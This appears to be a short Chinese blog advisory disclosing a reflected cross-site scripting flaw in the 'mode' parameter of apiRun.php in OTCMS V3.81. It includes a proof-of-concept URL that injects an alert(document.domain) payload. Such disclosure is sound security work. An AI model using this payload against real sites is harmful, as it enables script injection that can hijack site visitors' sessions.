OTCMS 反射型XSS漏洞

一、漏洞摘要

漏洞名称: OTCMS 反射型XSS漏洞
上报日期: 2019-05-1
漏洞发现者: topsec_lizhongcheng
产品首页: http://otcms.com
版本: V3.81

二、漏洞概述


apiRun.php 在处理mode参数没有进行过滤,直接输出到页面,造成反射型xss漏洞

poc:

http://192.168.3.51/OTCMS/apiRun.php?mudi=autoRun&mode=";alert(document.domain);"



评论

此博客中的热门博文

Gila CMS 1.10.1 任意文件下载漏洞

Gila CMS 1.10.1 CSRF 漏洞